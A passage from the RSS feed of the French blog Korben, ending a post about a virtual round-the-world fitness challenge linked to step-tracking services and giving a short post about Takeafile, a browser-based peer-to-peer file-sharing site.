Ainsi, chaque jour, en fonction de vos pas ou du sport effectué, vous saurez où vous en êtes. Et pour savoir si vous avancez, le site se connecte sur les services de tracking suivants :

  • RunKeeper
  • Withings
  • Nike+
  • Runtastic
  • Strava
  • Endomondo
  • FitBit
  • Google Fit

Il est bien évidemment aussi possible d'entre vous-mêmes vos kilomètres à la mano.

Screenshot 2016-05-04 08.33.22

Un bon moyen de se motiver donc et surtout de mieux se rendre compte de sa progression. Après c'est sûr que ça ne vaudra jamais un véritable tour du monde mais qui sait, ça vous donnera peut être envie de vous lancer dans l'aventure IRL.

Et 40 000 km c'est pas tant que ça... Bah quoi ? :-D

Source

Cet article merveilleux et sans aucun égal intitulé : Et si vous faisiez un tour du monde virtuel ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Korben http://korben.info/auteur <![CDATA[Take a file – Partager un fichier sur le net sans limite de taille]]> http://korben.info/?p=78030 2016-05-03T12:49:56Z 2016-05-03T12:49:56Z Besoin de transférer quelque chose à l'un de vos amis, mais vous n'avez pas envie de stocker ça sur un Dropbox ou un WeTransfer ? Pas de souci grâce à Takeafile. Vous glissez / déposez un fichier de la taille de votre choix, sur le site, et vous envoyez l'adresse générée à votre correspondant. Celui-ci > Lire la suite

Cet article merveilleux et sans aucun égal intitulé : Take a file – Partager un fichier sur le net sans limite de taille ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>
Besoin de transférer quelque chose à l'un de vos amis, mais vous n'avez pas envie de stocker ça sur un Dropbox ou un WeTransfer ?

Pas de souci grâce à Takeafile. Vous glissez / déposez un fichier de la taille de votre choix, sur le site, et vous envoyez l'adresse générée à votre correspondant. Celui-ci en s'y rendant avec son navigateur déclenchera alors un téléchargement directement entre lui et vous (P2P).

Cela implique bien évidemment que lui et vous laissiez votre navigateur ouvert sur le site Takeafile jusqu'à la fin du transfert.

Screenshot 2016-05-03 14.41.59

Ça peut dépanner !

Cet article merveilleux et sans aucun égal intitulé : Take a file – Partager un fichier sur le net sans limite de taille ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

]]>